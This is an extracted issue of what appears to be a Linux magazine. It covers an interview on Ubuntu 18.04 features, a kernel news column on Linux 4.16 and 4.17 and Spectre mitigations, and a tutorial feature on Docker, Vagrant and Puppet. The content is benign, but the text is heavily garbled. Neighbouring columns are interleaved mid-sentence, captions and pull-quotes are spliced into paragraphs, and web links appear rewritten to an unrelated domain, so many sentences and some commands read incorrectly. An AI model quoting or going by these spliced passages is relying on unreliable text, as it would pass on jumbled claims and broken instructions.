could explain the reasoning for doing that? of remote speakers. It could be streamed over the
WC: Yeah. When we started with GNOME Shell in network. It could be written to disk. All of these
17.10, Wayland was looming large. The benefits things that you can do with audio, you’ll be able to
of Wayland come back to the security story. do with video.
For example, applications can’t snoop on other Part of that API is that it’s a good natural fit for
applications. They can’t steal keyboard input events screen sharing, for there to be another sync for you
from other applications. You can’t pop up an invisible to dump video into that can then be picked up by

Quick guide
Encryption changes
In September 2017, Dustin Kirkland, former anymore; alternatives exist’. “It would be
VP of Product, indicated that Canonical unfair on our users to keep ecryptfs in main
had done a lot of work with Google on ext4 for 18.04,” Cooke confirmed later in an email,
© 2012 eCryptfs.org

encryption with fscrypt. Eventually, he said, “if we cannot be 100% certain that it will be
they planned to depreciate eCryptfs. In fact, supportable for the duration of the LTS life.”
the release of Ubuntu 18.04 sees the removal Ubuntu’s position is that full disk
of eCrypt entirely, along with any option to encryption using Linux Unified Key Setup-
encrypt the home drive in the 18.04 installer. on-disk-format (LUKS) is the preferred
This might sound like a worrying change, method. eCryptfs has been moved from the
but, according to Will Cooke, this was done main repo to universe, if you still want to use Above According to Will Cooke, eCryptfs
because the service is unmaintained – or, it. Currently, Canonical has confirmed that baffled some users: “We had full disk
as the Launchpad bug report elaborates, fscrypt is not considered mature enough to encryption and home directory encryption…
‘Buggy, under-maintained, not fit for main feature in 18.04, but will be a target for 20.04. Why would I want to do one over the other?”

14
top
features
of ubuntu
other applications, and processed and streamed
and all the other kinds of things.
18. 4
That needs those applications to support the
API, and they won’t do that until it’s finished
and is stable. So it’s still relatively early in the
page 58
development cycle of PipeWire. It will probably make
an appearance in 18.10 – certainly 19.04. And then
hopefully, the browsers, for example, will pick up on
it, and integrate support for it into their packages,
and then we’ll be in a good place to leverage it.

NVIDIA doesn’t support some of the APIs that Above Ubuntu 18.04 benefits from GNOME 3.28’s
are required for the Wayland compositors, so is improvements to GNOME Boxes, which makes spinning up
Wayland ever going to reach a level of stability new VMs really simple, albeit with limited options
that’s acceptable for an LTS?
WC: Yes, it will do, I’m pretty sure of that. There feedback that we received from the community,
were some changes in the APIs which meant there was that the old Debian installer was just clunky
was some incompatibility there. But they’re being and hard to navigate. So we’ve spent time over the
addressed. There were known issues, known bugs, past couple of cycles making a new server installer,
and they will be fixed, no doubt about that. based on that feedback. The server installer is
called Subiquity with the Desktop installer called
So there’s no question that NVIDIA is just Ubiquity. That is a new image-based installer that
not interested in Wayland and don’t want to
incorporate –
goes significantly faster than the old package-based
installer. Also, it asks you far fewer questions. Ubuntu-
WC: No, no, they definitely care about that. But
also, we’ve got a really good reputation with NVIDIA
The idea is that it asks you how to configure the
network, how you want to configure your disks, and
Minimal
through their deep-learning AI side of things as well. then install. So that nice ‘just press Enter workflow’ came out of
The deep-learning stack that comes from NVIDIA, through the program takes just a few minutes to get
it’s all built on Ubuntu. So we have a really good through, and you’re done. one of those
relationship with those guys already. And we have
regular calls on these sorts of issues – not only
Moving on to other things that we got feedback
on… one that’s coming up is that networking has
feedback
the massive parallel processing compute side of always been difficult to configure on Ubuntu. It is requests that
things, but also the graphical side of things is being something that is called etc/network/interfaces or
discussed directly with those graphics card vendors ENI, for short. That is a legacy system that spans we did
on a regular basis. So yeah, I have no doubt that multiple generations of Unix in different forms. In
we’re in a good position to be able to get those bugs the modern world, there are two ways to configure
fixed. And they do care. They absolutely do care. networking. One is a NetworkManager that is used
mostly on desktops and IoT devices. The other one
You’ve been also been experimenting with is systemd-network, which is a systemd module for
Zstandard compression. How’s that going? configuring networking, which we are targeting for
DAVID BRITTON: We did some work, this cycle, to the server environment.
bring the latest supported version of Zstandard Since there’s these two different ways to
back to Xenial. There’s also been some talk on the configure it, they have their own little quirks. Ubuntu
APT compression front, offering Zstandard as an is launching in 18.04 a tool called netplan.io. It’s a
alternative to GZIP and XZ compression and the configuration generator. So you type in a very simple
other compression types that are there. And then YAML format – how you want your network to look.
possibly changing that in the 18.10, maybe 19.04 It can be as simple as three lines. It will render the
timeframe, for the default, for APT compression. correct back-end networking data for either the
We were looking at it for 18.04, but it’s just a bit too NetworkManager or systemd-networkd – whichever
early to make that kind of a change. It looks very system you happen to be on. It kind of simplifies the
promising, but it looks more like an 18.10 timeframe way that you can view networking.
where we’ll have that data. One [feature], which is a small thing, but people
clamour for it: htop. Anywhere that Ubuntu Server is
As with the desktop, you also ran a survey for the installed, htop will now be available and supported
server side of things. What responses did you get by Canonical. That is a big one for sysadmins who
from that? have been asking for it for a while. The last one
DB: Ubuntu-Minimal came out of one of those that I wanted to bullet point was LXD 3.0, which is
feedback requests that we did. [Another] bit of Canonical’s supported container solution.

www.linuxuser.co.uk 15
OpenSource Your source of Linux news & views

opinion

The kernel column


Jon Masters summarises the latest happenings in the Linux kernel
community: Linux 4.17-rc1 is released, development continues on 4.18

L
inus Torvalds has announced Linux 4.16, This culminates in a Release Candidate 1 (RC1) kernel as
noting that things had calmed down it did with 4.17-rc1. The latest kernel is once again fairly
sufficiently at the last minute to avoid the heavy on the security features, including receive-side
need for an RC8 (Release Candidate 8). support for TLS (the kernel now has complete in-kernel
Those things that had remained in flux toward the end TLS support), various additional capabilities in the BPF
were mostly networking-related, and the networking packet filter, and robustness enhancements for mounting
maintainer had explicitly said he was okay with it. The ext4 filesystem images by untrusted users.
4.16 kernel includes a number of new features, among The latter comes with a warning from ext4 filesystem
them AMD’s Secure Encrypted Virtualization (SEV), and maintainer Ted Ts’o. He hopes container folks don’t “hold
Jon Masters many additional mitigations for Meltdown and Spectre any delusions that mounting arbitrary images that can
Jon is a Linux-kernel security vulnerabilities across various architectures. be crafted by malicious attackers should be considered
hacker who has been On the latter point, 4.16 pulled in upstream mitigations sane”. Finally, 4.17 will minimally require GCC 4.5 on x86 –
working on Linux for Spectre variant 1 (bounds-check bypass) exploits. which is true of all Linux distros from the past few years–
for more than 22 These rely upon vulnerable code sequences within the due to a now non-optional feature (Assembly language
years, since he first kernel that attempt to test whether an untrusted value ‘goto’ jump support) dependency.
attended university provided by the user (that is, the application) is within a Perhaps the most interesting development in 4.17, at
at the age of 13. Jon permitted range. least for me, is the removal of support for eight – yes,
lives in Cambridge, Processing of that data should not continue unless eight – different architectures. While Linux prides itself
Massachusetts, and it lies within a desired range, but many processors on being progressive and reasonably swift in adoption
works for a large will speculatively continue execution beyond the of support for the latest hardware, it traditionally has
enterprise Linux check before they have completed the in-bounds test. been less swift in the removal of support for long-dead
vendor, where he is Addressing Spectre variant 1 is currently a matter of software features and hardware devices. There are
driving the creation identifying vulnerable kernel code (through a scanner) many stories over the years of Linux retaining support
of standards for and wrapping it with one of various new macros, such as for hardware that is no longer available, sometimes for
energy-efficient ‘array_index_nospec()’. This prevents speculation beyond amusingly perverse periods of time. In some cases, this
ARM-powered the bounds check in a portable manner. is a great thing since upstream may continue to provide a
servers. At an architectural level, Meltdown mitigation using certain level of support for popular hardware even after
KPTI (Kernel Page Table Isolation) was merged for arm64 the company that built it goes away. But in other cases,
in 4.16, as well as support for Spectre variant 2 mitigation code can ‘bit-rot’ and simply occupy space, consuming
through branch predictor invalidation (via Arm Trusted developer time in unneeded maintenance.
Firmware). s390 (mainframe) gained a second mitigation This was the case with the eight architectures removed
for Spectre variant 2, complementing the existing support in 4.17. Arnd Bergmann had given plenty of notice of
for branch predictor invalidation, using a new concept candidates for removal, ultimately working with the
known as an ‘expoline’. maintainers of blackfin, cris, frv, m32r, metag, mn10300,
While x86 implements ‘retpolines’ (return trampolines) score and tile, to remove them from upstream Linux. Of
that make vulnerable indirect function calls appear to these, it’s likely that few people will have even heard of
be not vulnerable function returns, s390 makes these more than one or two.
indirect calls appear to be execute-type instructions As Arnd put it, “In the end, it seems that while the eight
exposed through the new execute trampolines. architectures are extremely different, they all suffered
the same fate: There was one company in charge of
Heavy on the security an SoC line, a CPU microarchitecture and a software
With the release of 4.16 came the opening of the 4.17 ecosytem, which was more costly than licensing newer
merge window. This is the period of time, typically two off-the-shelf CPU cores from a third party (typically
weeks, during which Linus will pull vetted but potentially ARM, MIPS, or RISC-V). It seems that all the SoC product
disruptive changes and new features into a future kernel. lines are still around, but have not used the custom

16
CPU architectures for several years at this point”. In
order words, the companies remain, but they’re all using
commodity cores at this point.
On a side note, it was recently discovered that support
for (much older) IBM POWER4 systems was accidentally
broken back in 2016. As nobody has complained about
it since then, this support has also been removed
from upstream. Of course, POWER remains a popular
architecture, with great upstream support for all of the
latest POWER8 and POWER9 hardware. Sometimes
even well-maintained architectures benefit from a little
spring-cleaning of older code.

Fuzzing, RISC-V and more


Syzbot is a “continuous fuzzing/reporting system
based on syzkaller fuzzer”. It sends periodic emails to
the Linux kernel mailing list with logs about code that
crashed when it was fuzzed – that is, fed garbage data.
Dmitry Vyukov (Google) announced that there is now a
dashboard available at https://syzkaller.appspot.com
through which developers can access all outstanding bug
reports. In a follow-on discussion with Linus, Dmitry took fear – another kernel cycle is just around the corner for
various feedback on ways to improve the tool, which he these patches.
swiftly implemented. Laurent Dufour posted version 9 of his ‘Speculative
page faults’ patches. We’ve mentioned
these before –they’re a more positive use
Perhaps the most interesting of the term ‘speculation’ than we’ve seen
of late. The basic idea is to try to handle
development in 4.17 is the removal userspace page faults, which happen
when an application accesses memory
of support for eight architectures that hasn’t yet been allocated, is still
on disk due to being paged or swapped
to disk, or is application data not yet
The RISC-V architecture is continuing to gain loaded. The new patch makes the assumption that this
momentum. The latest patches resolve issues found memory doesn’t touch regions of memory shared with
when building modules for 64-bit kernels. The addresses other threads. If it does, then the fault is re-tried with
of functions contained within those modules need to be locks held.
used in function calls (jumps) that must be relocated Alexander Duyck posted “Add support for unmanaged
(fixed up) on module load. RISC-V kernel support was SR-IOV”, which aims to address the exploding complexity
missing some standard relocation types needed to of SR-IOV (Single Root I/O Virtualization) solutions on
handle this. Incidentally, we’ll have more on RISC-V in a servers today. SR-IOV allows Virtual Functions of PCIe
forthcoming issue, including a review of the SiFive HiFive devices to be passed through directly to virtual machines,
Unleashed development board running Fedora. which can then use those functions as if they were
Matthew Wilcox posted version 9 of his XArray standalone devices.
replacement for the existing in-kernel radix tree For example, a GPGPU with SR-IOV support could allow
implementation. He had hoped to see this merged for multiple VMs to each have its own ‘GPU’. SR-IOV today
4.17, but obviously has been at this game long enough to requires both a PF (Physical Function) driver in the host,
have known that it would be a long shot. Andrew Morton as well as VF (Virtual Function) drivers in guests. It would
commented that one of the patches could come in as-is, appear that Intel is interested in providing a generic PF
while with some of the others he “ran out of nerve”. Not to solution in pci-pf-stub.

www.linuxuser.co.uk 17
Feature Take control of containers

Containers Bobby Moss explores how containers and


scripts can save you time, help to recover
systems and make deployments easier

B
ack in the mists of time, Marc 2018, almost every company needs to be a
Andreessen coined the phrase software company to compete effectively
“Software is eating the world” in within their markets.
an oft-quoted essay he wrote for the Wall There are so many problems that
Street Journal. In 2011 he foresaw that automation can solve for us. For example,
virtualisation and abundant hardware a common issue affecting network
resources would lead to vast data administrators is that different servers
warehouses and increasing systems of across a network can have different
automation that would disrupt how every configurations and different versions
industry across the world works. Now, in of software packages running on them.

Tutorial files
available:
filesilo.co.uk

18
at a glance
Where to find what you’re looking for
• Docker • Script with • More Vagrant • Puppet • Configure
deployments p20 Vagrant p22 providers p24 provisioning p26 Ansible p28
Discover everything Fully automate Extending our Centrally manage web Set up a worthy
that you need to get the creation of automation of virtual applications and keep alternative to Puppet
started with creating, virtual servers and server creation on server configurations and Chef, then use it to
running and managing environments across enterprise platforms synchronised across manage applications
Docker containers different devices, such as Hyper-V and your devices and and configuration files
on web developer machines and OSes VMware vSphere, as well networks with this across machines by
workstations through with the help of a as cloud platforms like established and well- writing your very own
to enterprise servers. scripting language. AWS and Azure. supported tool. playbooks.

Puppet and Ansible can centrally manage fewer bug tickets, more stable production patchy documentation how to successfully
configuration files, package versions and environments and less time spent puzzling install an application. Simply deploy the
scripted deployments so you can tweak out what a mysterious log entry means container on your server and it should work
settings, perform upgrades and roll during a criticial outage. exactly the same way it did for the original
everything back to a ‘known good’ state We’ll also look at Docker. This technology developer, in any environment you choose
across your entire network almost instantly. packages individual applications into a to deploy it in.
Another problem used to be that container that’s far more lightweight than The other great thing about automation,
sysadmins would have to over-provision a virtual machine. This means developers virtualisation and containerisation is
their server resources to allow for peak can spin-up containers without setting up resilience. If a application goes down it
loads and futureproofing. With the an entire development environment, and doesn’t matter, because you can kill it
introduction of cloud computing and and start another
supporting systems to augment on-site one in a matter of
infrastructure, this has become much Developers can spin-up seconds. When your
less of an issue, but making good use of network is under
virtualisation can ensure you make even containers without setting up an peak load you can
better use of existing on-site hardware instantly provision
resources first. entire development environment more virtual servers
We’ll be exploring Vagrant in this feature to cope, then delete
in some depth; it’s a system that can almost all of them
automate the creation, editing, running emulate the network infrastructure and as soon as it troughs.
and deletion of virtual machines across dependent components that their scaled Lastly, we haven’t forgotten those of you
all kinds of different machines and applications will be relying on once those who are just dipping your toes into Linux
virtualisation products. We’ll also cover apps are released. administration for the first time, developers
how it can be used to spin-up environments Sysadmins will also be particularly living under restrictive corporate
that are representative of ‘production’ excited about containerisation because policies, or sysadmins dealing with mixed
on your workstation, so that you can run it means that when developers decide infrastructure containing Windows and
behaviour-driven tests against them. to use technologies that aren’t already Mac servers. All the technologies used
This means you can check that your web supported internally (such as NodeJS, throughout this feature are cross-platform,
applications match customer requirements the Go language, Python 3 and so on), and we’ll even be discussing how to use
and pass all your continuous integration you no longer have to deal with a kind of Vagrant with commercial products such as
tests before you even push your code to ‘dependency hell’ on your existing server VMware vSphere and Microsoft’s Hyper-V
version control. In the long run this means operating systems, or puzzle out from virtualisation technology.

www.linuxuser.co.uk 19
Feature Control Containers

Docker deployments
Package your applications for easy deployment and run them on any system

T
he central premise of Docker is
that you should be able to package
any application once in a
‘container’ and then run it anywhere without
needing to install any extra dependencies.
The project itself was originally released in
2013 as an add-on for the Linux kernel by
Solomon Hykes, who became renowned for
keeping tight control over the way the
product was developed and evolved by the Above Docker Compose makes testing database- Above With one command in the terminal, you
wider community. driven sites with multiple containers easy can have a web server up and ready for testing
The way Docker differs from a standard
virtualisation system, such as Oracle hosted by Docker Inc. In this feature we’ll be ‘mywebsite’ and launches a pre-configured
VirtualBox or VMware Workstation, is that looking at the Community Edition, as anyone container with Nginx (our web server)
it uses the resource-isolation features of – regardless of whether they’re a hobbyist installed. There are two additional flags:
the host Linux kernel rather than just the developer or an in-house IT technician – can -P exposes ports 80 and 443 (HTTP and
virtualisation features of the CPU. As a result, download and use it. Everything we cover HTTPS) from the container and maps them
Docker uses far less memory and processing should also work on the Enterprise Edition. to a new value, so we can call them from the
power, and the individual application The first thing you’ll need to do is localhost domain or the IP address 127.0.0.1.
containers it generates are much smaller install the Docker daemon that tracks the -d runs the image in detached mode, so
and easier to distribute than full-blown containers you launch, and the Docker client the container won’t listen to any further
virtual machines packaged with their full- that launches them in the first place – just terminal input and will keep running until you
sized virtual hard drives. follow the walkthrough below. Once you have specifically choose to destroy it.
There are two versions of Docker: the familiarised yourself with the basics you can You should be able to use the same
Community Edition and the Enterprise try running a simple web server: verification step from the walkthrough below
Edition. Both have the same core to verify that the container has been created
functionality and are licensed under the $ docker run --name mywebsite -P and is running as expected. The local port
Apache License v2, but the latter comes -d nginx mapping will also be listed, so assuming port
with a support contract and the ability to 80 on the container is mapped to 49153, for
run ‘certified’ containers on infrastructure This creates a new docker container called example, you can even see the web server

how to
Set up and use Docker

1 2 3
Install Docker Set up Docker Compose Create a container
Find instructions on how to This is a helpful tool for creating Pull down a new container, verify
configure your package manager applications that span multiple it’s installed and run it with:
and install both the Docker daemon and containers, such as a website that’s split
client app at http://bit.ly/lud_install. If this into a webserver, database and content $ docker pull busybox
doesn’t work you could also try installing hosting components. See http://bit.ly/ $ docker run busybox echo "testing
the binaries from http://bit.ly/lud_binaries. lud_compose for installation details. my container"

20
test page in Mozilla Firefox or from the $ docker run --name website2 -v /
terminal with: var/www:/usr/share/nginx/html:ro -P -d
nginx
$ curl http://localhost:49153
The ro in this line ensures that file contents
However, a web server is only as good as the can only be edited on the host system and
website it’s serving. Currently all we have not by any processes that might be running in
the container.
The other way to do
It uses the resource-isolation this is to define which Above Search for more pre-built containers on
files you want to copy Docker Hub, https://hub.docker.com/explore
features of the host Linux kernel to the container using a
file called Dockerfile, we can use Docker Compose to automate
rather than just CPU features with no extension. We this in a single step. On the coverdisc we
have some examples have a sample Dockerfile with an Ansible
on the coverdisc and provisioning script that will install Ruby on
is an Nginx test page; we need to get some Filesilo, but the content in this case would be: Rails with a PostgreSQL database. Once you
HTML files into the Docker container, and have extracted the tarball the following pair
there are three ways of going about this. # FROM nginx of commands builds it:
One would be to run the container without # COPY content /var/www
detached mode so we can still SSH into it # VOLUME /usr/share/nginx/html $ docker-compose run web rails new
and transfer files using SCP. Another would . --force --database=postgresql
be to specify data directories when we first Once you are ready you would rebuild and run $ docker-compose build
launch our docker container. For example, your container using
you could map the contents of /var/www to Next replace the generated config/
nginx’s default web directory in Docker using: $ docker build -t mywebserverimage database.yml with our version so that
. Rails no longer tries to connect to the
$ docker run --name mywebserver4 -P host system, then run the following in
quick tip -d mywebserverimage two different terminal windows:
Roll your own containers
The easiest way to create your own You should then be able to see your new $ docker-compose up
containers is to fetch vanilla ‘ubuntu’ website being served at the new localhost $ docker-compose run web rake
or ‘coreos’ and customise it with your port mapping. db:create
Dockerfile. You can then use ‘docker Now, let’s say we have a more complex
build’ and ‘docker save’ to create and set of requirements, such as developing At this point you should be able to visit
export the final product. a database-driven website. Rather than the Rails welcome page via http://
manually specifying each individual container localhost:3000.

4 5 6
Check container status Access your container Destroy your container
You can view all the currently Connect to your container and run After fetching the container
installed container types using multiple commands using -it: ID using the second command
docker images. To get more useful in step 4, you can stop and remove that
information such as which containers are $ docker run -it busybox sh specific instance with $ docker rm -f
running and what they’re up to, you should # ls containerid. On successful deletion you
try: $ docker ps -a. # ps -a should see the containerid displayed.

www.linuxuser.co.uk 21
Feature Control Containers

Script with Vagrant


Automate the creation and management of virtual machines across servers

V
agrant is a mature product
sponsored by a company called
Hashicorp. Its main purpose is to
provide a common command-line interface
and provisioning structure across different
virtualisation technologies. This means you
can use the same commands with Oracle
VirtualBox as you would with VMware
Workstation and Hyper-V. Vagrant
accomplishes this through the use of drivers
which provide a wrapper for the command-
line interface of whichever product you are
provisioning your virtual machines with.
This also means you can create a single
script to provision your server infrastructure,
and if your on-site servers run out of space
– or you use up all the licenses you’ve paid
for– the same VMs can be created using
a different product or cloud provider. This Above When only a GUI will do, you can edit your Vagrantfile to install a desktop and not run headless
makes Vagrant a very powerful tool for
sysadmins looking to roll out their own containerisation. Well, Vagrant can provision You’ll notice that no extra windows have
software-defined networks. Docker containers in exactly the same way it appeared on the screen. That’s because
Developers will also find Vagrant does with VMs. It’s also possible to deploy a Vagrant VMs run headless by default, so you
particularly useful because they can create Docker container on any virtual server within would access it using
a common desktop environment with all your network by setting it as the application
‘provisioner’ Vagrant $ vagrant ssh-config
runs after creating and $ vagrant ssh
Vagrant can provision Docker booting a VM.
The first step is to Any file that you place in the same directory
containers in exactly the same install your virtualisation as Vagrantfile will also be available to the
platform of choice. guest operating system under /vagrant.
way it does with VMs Vagrant supports Oracle However, you may wish to run a full GUI on
VirtualBox natively, as your VM, and in that situation a headless
long as you also install setup with only SSH access wouldn’t be
the required IDEs and tools installed and its associated extension pack. VMware particularly helpful. Fortunately, there’s a
roll this out quickly and easily for new team Workstation is also supported on local way to change this behaviour.
members. It’s also possible to simulate a desktops, but you will need to purchase the You may have noticed that when you ran
full server that’s more representative of proprietary Hashicorp driver for Vagrant to vagrant init, a file was created in the test
a production environment – particularly work with this ‘provider’. directory called Vagrantfile. This is where
useful for software testing. You may be Next, fetch the installer from www. you can tweak the settings for your VM, and
wondering how Vagrant ties in with app vagrantup.com. You should avoid installing by default it is filled with plenty of hand-
Vagrant through your package manager, as it holding comment lines to help you navigate
will often be an old version that may not be it. You will notice that config.vm.box
quick tip fully compatible with the latest and greatest defaults to base, or whatever you stated as
Managing Vagrant plug-ins release of VirtualBox. a choice when you
You can check which plug-ins have As soon as the install is complete you can ran the vagrant init
been installed with the command $ boot your first virtual machine, without any command. Scroll past
vagrant plugin list. Simply replace prior configuration, using just a few simple the sections for port
list with update to download new commands. For example: forwarding and shared
versions of these plug-ins, and to add folders, and you’ll find
new functionality try vagrant plugin $ mkdir test && cd test the following code line:
install vagrant-exec. $ vagrant init bento/ubuntu-18.04
$ vagrant up

22
products
Hot Vagrant plug-ins
Extending functionality is a vagrant
plugin install command away

1
BDD with Cucumber
With the help of vagrant-
cucumber, you can run all your
Above Hashicorp’s documentation covers provisioners, providers, command line help and Vagrantfiles behavioural tests locally against your
Vagrant VM. To launch them, copy your
# vb.gui = true to boot up, so you may prefer to save the pre-existing .feature files and step
current machine state and resume from it definitions to the Vagrantfile folder and
Unfortunately, just uncommenting that line instead. You can do this with run vagrant cucumber from there.
by removing the # won’t work. Vagrant is built
on Ruby, so you need to ensure the config. $ vagrant suspend
vm.provider line and its matching end are $ vagrant resume
also uncommented. Once you’ve saved your
changes you can restart the VM with You can gracefully shut down a VM by telling
it to halt, and once you’re done with the box
$ vagrant reload you can delete it with destroy. If you need
to verify the current state of your VM before
you run any commands
at all, you can get some
Uncomment a single line in
2
useful output from: Shell commands
vagrant-exec runs shell
your Vagrantfile to map port 80 vagrant status commands inside your VM,
and you can do this by navigating to the
to http://localhost:8080 It’s also wise to take Vagrantfile directory and prefixing
regular snapshots which each one with vagrant exec. It’s easy to
you can roll back to if remember and means you don’t need to
If all has gone well you should now see a VM you make any mistakes or run into problems. create a new SSH session each time.
window appear with a shell login prompt. The pair of commands you need for this are
The VM we specified earlier is a server
distribution of Ubuntu 18.04, so to install vagrant snapshot save REF
the GUI we would need to install ubuntu- vagrant snapshot restore REF
desktop through the package manager.
Just like real machines VMs take a while where REF is whatever you want to call your
snapshot. The first command creates the
snapshot while the latter restores from it.
quick tip We mentioned earlier that it’s possible
Create your own box to forward ports with your Vagrant VMs. By

3
It’s possible to create your own base default the only forwarded port is SSH, which Fabric provisioning
image for Vagrant and provision VMs is mapped to localhost:2222, and all others vagrant-fabric takes things
using it. You will need to tweak your base are inaccessible from the host system. a step further by enabling
image, populate a metadata JSON file Simply uncomment a single line in your you to execute scripted actions and
and then package it for your provider. Vagrantfile to map HTTP port 80 to http:// deployments with the help of a Python
Find out more at www.vagrantup.com/ localhost:8080. You can also copy and paste 2.7 extension called Fabric. Use it as a
docs/boxes/base.html. this line, editing the port numbers as needed provisioner in your project’s Vagrantfile.
for the app you’re running in your VMs.

www.linuxuser.co.uk 23
Feature Control Containers

More Vagrant providers


Use your scripts with commercial virtualisation platforms and the cloud

V
agrant’s native support for Oracle image and run it, replace d.build_dir with:
VirtualBox is not your only option
for using it. Thanks to community # d.image = "nginx"
plug-in support and code contributions, it’s
also possible to use other providers. This is In both cases Vagrant is smart enough
particularly useful in enterprise settings to forward the right ports and set up a
where you might already be running folder share with the same directory as
your Vagrantfile. If
you’re trying to do
Unlike the Docker provider you either of these things Above Provisioning Docker containers with
on a non-Linux host Vagrant is handled just as elegantly as VMs
will need to install the OpenStack system, Vagrant will
attempt to provision everything with Puppet: see https://wiki.
provider as a plug-in a VirtualBox VM from openstack.org/wiki/Packstack.
a ‘boot2docker’ image Just like our Docker provider you can
first so it can still set use specific settings in your Vagrantfile to
something more scalable like OpenStack or up your Docker containers as instructed. provision new instances on OpenStack, and
VMware vSphere. As an example, you can OpenStack is intended to be a free and you can see a sample of this on its GitHub
use Docker as a provider for your Vagrant open source software platform for in-house page, http://bit.ly/lud_openstack. Unlike
configurations on Linux hosts just as easily cloud computing. OpenStack itself can be the Docker provider you will need to install
as you would VirtualBox. The only difference tricky to set up on test rigs and it needs the OpenStack provider as a plug-in:
is the exact set of commands you would use a lot of raw hardware power to be useful.
to do that in your Vagrantfile: Fortunately, you can use PackStack to build vagrant plugin install vagrant-
openstack-provider
# Vagrant.configure("2") do |config|
# config.vm.provider "docker" do quick tip If only one provider is specified your
|d| Try Kubernetes with Vagrant Vagrantfile should default to using it.
# d.build_dir = "." Sometimes Docker containers need to However if you have more than one
# end be deployed at scale and that’s where specified, or Vagrant doesn’t seem to
#end Kubernetes comes in. Try it out locally be detecting it, you can force a specific
with Vagrant by cloning the project’s provider choice:
This tells Vagrant to use Docker as a official GitHub project and running $
provider, and then instructs that provider to export KUBERNETES_PROVIDER=vagrant vagrant up --provider=openstack
build a container from the Dockerfile you’ve then $ ./cluster/kube-up.sh
provided. To directly download a container Another popular (albeit non-free) enterprise

Quick guide
Vagrant in the cloud
Scripting and managing your own servers have functionality in common with Azure
and in-house infrastructure is far from the and Google Cloud. As a result you may still
only use for Vagrant. There are community need to use a mix of Vagrant and custom
providers for a whole host of cloud scripts to get the most out of
platforms, which means that you don’t your subscriptions.
need to create new scripts for different However, if you just need to create the
APIs every time you want to create VPSs same EC2 instances on a regular basis,
with a new provider. and can skip tools like Elastic Beanstalk,
However, there are certain limitations. you can provision a VM by specifying your
For example, AWS creates new services AWS authentication settings and AMI
on an almost daily basis and there is only configuration using the sample Vagrantfile Above Hashicorp provides its own service for
a limited subset of its API that’s going to at http://bit.ly/lud_aws. provisioning VMs across multiple cloud providers

24
Top Left Vagrant makes light work of automating the provision of VM infrastructure with OpenStack
Above Left Provider plug-ins normally supply a handy sample Vagrantfile with the original source
Above Right Vagrant supports Hyper-V, but some extra manual preparation steps are required quick tip
Alternative provisioners
virtualisation platform is VMware vSphere. plug-in, but you’ll need to install a number In this feature we primarily focus on
Just like OpenStack it’s supported as a of packages before it will build and run Puppet and Ansible, but these are not
Vagrant provider once you’ve installed the correctly. You can find out which ones the only provisioning systems available.
plug-in for it: you need and how to install them on your Chef is a well-established alternative
distribution of choice at http://bit.ly/ and a new Python-based system called
vagrant plugin install vagrant- lud_libvirt. Another popular virtualisation SaltStack is now available. Both are
vsphere platform in many businesses is Hyper-V, an supported as Vagrant provisioners.
optional component for Windows that’s been
You have the choice of building from a box or available since Windows 8 and Server 2008.
re-using any from within vSphere. Any boxes This native hypervisor for the NT kernel was to choose one or the other to run on your
you create with VMware Workstation will originally created to replace the venerable host system. It gets a little worse, too, as
usually work with vSphere after some minor Microsoft Virtual PC, an application that Vagrant is not able to control everything it
tweaks because of the shared underlying can be best described as a Windows-only needs to with Hyper-V to fully function right
technology, although you may find it easier alternative to VirtualBox. away. For example, it isn’t able to create or
to simply import the VM image through the It’s fair to say that Hyper-V is a lot more configure new virtual networks on the fly,
management console and use it as a server sophisticated, isolating virtual machines so you’ll need to set this up manually before
template instead. Read more at http://bit. into their own ‘partitions’ and intercepting you start using it. Similarly it’s unable to
ly/lud_vsphere. automatically set
Finally, if the virtualisation product you a static IP address
use is based on the XenServer hypervisor, Bear in mind that while Hyper-V or automatically
you’re also in luck. The vagrant- configure NAT access
xenserver provider plug-in is enabled on your system, Oracle to the rest of your
requires you to create your network. There’s more
own boxes, but fortunately you VirtualBox won’t run info at http://bit.ly/
have some options. XVA files lud_hyperv.
stored locally on the hard disk If you can get
or at a network location are any direct calls to the hardware at the past these limitations, your main hurdle
supported, as are generic kernel level. It’s also the system on which will be in creating compatible boxes.
VHD files, which you can the official Windows port of Docker relies in Windows guests will need to have Windows
create in any VirtualBox order to function, although you’ll typically Remote Management up and running and
VM. See http://bit.ly/lud_xen find you’ll need to switch that off to avoid an OpenSSH server installed to function
for more on this plug-in. problems when you interact with Hyper-V correctly, and you will likely need to use the
KVM is also supported directly with Vagrant. Bear in mind that PuTTy SSH client (www.putty.org) because
as a provider by the while Hyper-V is enabled on your system the vagrant ssh command doesn’t work on
vagrant-libvirt Oracle VirtualBox won’t run, so you will need Windows by default.

www.linuxuser.co.uk 25
Feature Control Containers

Puppet provisioning
Centrally manage application deployments and server configuration files

P
uppet’s main function is to manage of network services and restart them as
configuration for Linux and needed. It can also verify if a specific version quick tip
Windows boxes across the network of a package has been installed or not. Should I use Puppet Enterprise?
by slaving their settings to a common The first thing you will need to get started The commercial version of Puppet
‘master’ configuration called a ‘catalogue’. is a Puppet master and at least one server provides server-auditing tools,
The key benefit of this is that you can set running the agent software. To accomplish a browser-based GUI for Hiera, support
common configurations for your servers in this with Docker we need to create two for provisioning VMs, sophisticated
one place rather than having to do it containers and tie them together in the same role-based access control and a support
manually on each server. emulated subnet so they will detect each contract. It’s up to you as to whether
This should, in theory, mean fewer hard- other, like so: these extras are worth the cost.
to-troubleshoot typos and confusing log
messages being caused by bad configuration $ docker network create puppet
values. However, Puppet takes this a step $ docker run --net puppet --name provisioned with Vagrant, you’ll first need
further by enabling you to define settings for puppet --hostname puppet puppet/ to create a VM with your Puppet master
smaller clusters of servers or even individual puppetserver-standalone installed and forward ports 22 and 8140. You
boxes from that same master server. As long $ docker run --net puppet puppet/ would then need to ensure you configure the
as the slave is running the supplied agent puppet-agent-alpine Puppet provisioner in the second VM to point
at the master. The code you need for the
In this example, the Puppet agent’s Vagrantfile looks like this:
This should (in theory) mean Puppet agent will spot
the server, fetch the # config.vm.provision "puppet_
fewer hard-to-troubleshoot typos latest configuration server" do | puppet |
and then immediately # puppet.puppet_server =
and confusing log messages terminate. The developer "server.domain"
has provided much # end
better examples that
software, and it has synced with the master make use of Docker Compose, as well as Simply change server.domain to the
at least once, it will respect any changes documentation on how to tweak catalogues, hostname or external IP address of your
